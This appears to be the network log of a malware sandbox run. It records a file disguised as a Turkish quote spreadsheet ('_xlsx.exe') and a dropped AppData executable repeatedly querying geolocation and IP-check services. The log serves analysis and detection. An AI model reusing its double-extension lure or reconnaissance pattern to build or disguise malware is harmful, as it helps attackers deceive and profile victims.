Oct 7, 2024 14:52:37.248243093 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f1f5401d8d7c7e29ffd4317b48ca35cb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49729	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:22 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:22 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61877 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Tpv9eO92bzfrTNRAWncnNCsI0fAB7TKEZibKmjcOQ1hRnAx6vrI7a3T49Ka1QVR6wKzno7tZgktHhcdYDtMdJaCJboPCLDl4xfWLbZfySzBkWUFVd7dxMR1hXyw%2BJ7OEl5lBm4%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee072afa5043bd-EWR
2024-10-07 12:52:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49740	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:23 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61878 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8Hfar9CGOv3gvJgN37k%2FErynThBd8ee87rSvvsfc4IrLTFaaMFMe7JKe4mIHwsCmzmRV%2FD9Q5Wj3vgkzEcKvQWiRr%2BUX4eSHZEfKTM10oLvHfelHDQQ1yRTkcbAN3z30OSYgX9D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07304bda432c-EWR
2024-10-07 12:52:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49748	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:25 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61879 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kiynl8RDzEyjTUVnqY6zUqhmNocs2nnGnPfNsm3V8674jujaKTBxFSqxs6KKbsQ%2FpFRIVjKEgyUSIXTDxxZPJ0U33qRsyWs5YRxFFioEqkC5kS2rQ59Q8XdHyC8m8AdjEoXGTrvw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07381846437e-EWR
2024-10-07 12:52:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49762	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:26 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:26 UTC	680	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61881 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0d0o%2FsnXDWRyWlHZwVCuBImXMDFCPlsYDmpgdl%2F7YO2KaWywbH8ert%2FzmyPOwRWnqh%2B%2BtP4WQOH1W6V4NmKwayrLZdTQOkXIaEBv8F214HF5v1EW4434KLHaaaluB9aXSLddBFKW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee0740281b1801-EWR
2024-10-07 12:52:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49768	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:26 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:26 UTC	686	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61881 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt%2BViTJ5v2lQItP7jfQDzJzTA%2FLtIwLP%2F%2FEqUkNcKsY48uDLhOd8o%2B9AEOc804CAFuxDHml2x4slj2yJDkl3o84GAtp%2F2pabVvAq%2BniCi9%2FgYeNxjbJoTSaElxENnWl2C96fv51T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07431a058cd4-EWR
2024-10-07 12:52:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49776	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:27 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61882 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnP4KR7ih0CebEnWwF5k%2F1Dpn3ncwB1xsOg7OkTOvBENrKPkM63fRpxTrSUMbjsAnAIJzE7G1txjlIkTJzLiJWKrU9BqYMRryHhMgiW%2BaXAoSCzXXX7NAO8oQiBq9422aFEB4DP9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07485c038cb4-EWR
2024-10-07 12:52:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49775	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:27 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61882 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2B4diHPUcNWY5xMnOIWjk1MtCsaTha9GdnU5II%2BSUbazQrxWkZlUA5UaIIjGBJ2ezUzQmBD4dS9Fotohw%2FO6yl4Y3Oftin52puxR5K7vt4toyPtmxDTpG2KvLzDL9qtHA7cvpvhc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee074858b69dff-EWR
2024-10-07 12:52:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49788	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:28 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61883 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ta2h1NdB%2Fuz6UxgCyn0uX6ZT0IiSxClKG7RrNvxzrKLSplniq2Rvx3GRwGkLLJC%2BHw8xltSWslwDomSgZDivEsatF0A5huTStjYQ6MspLsYnd28hDmXkKjOuM2zz9IA1UGhit8bg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07505ddc0cc6-EWR
2024-10-07 12:52:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49790	188.114.96.3	443	6504	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 12:52:29 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61883 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpvCbu4L%2BGtCjxock9dYSQ78mQnPkwTuX3TbTijDrffIsaG8xc0i1VU0HZ0ugHF9a7tT%2Bc6sQAgOPmM08dBM52XvtUiDQcMEODwibPfjzbxPLposZJaJGsBM0NXOER8w7b7zNaND"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee0750fb8a43f8-EWR
2024-10-07 12:52:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 12:52:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49798	188.114.96.3	443	7944	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 12:52:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 12:52:30 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 12:52:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61885 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MF0iLkuqFpg1su8tcqBE49NmaaJFXhsV4QNZj3%2BuAPdXZBq4hvAHMjD%2FSQ0e1%2Fm70yJFXPtHKAnqdosCIjsb%2F%2FDGidKOu3jy7CijWXLuD8iuNgLDet0Skwsd9dmSMxfHQm3CH%2BlK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cee07589a6417f9-EWR
2024-10-07 12:52:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
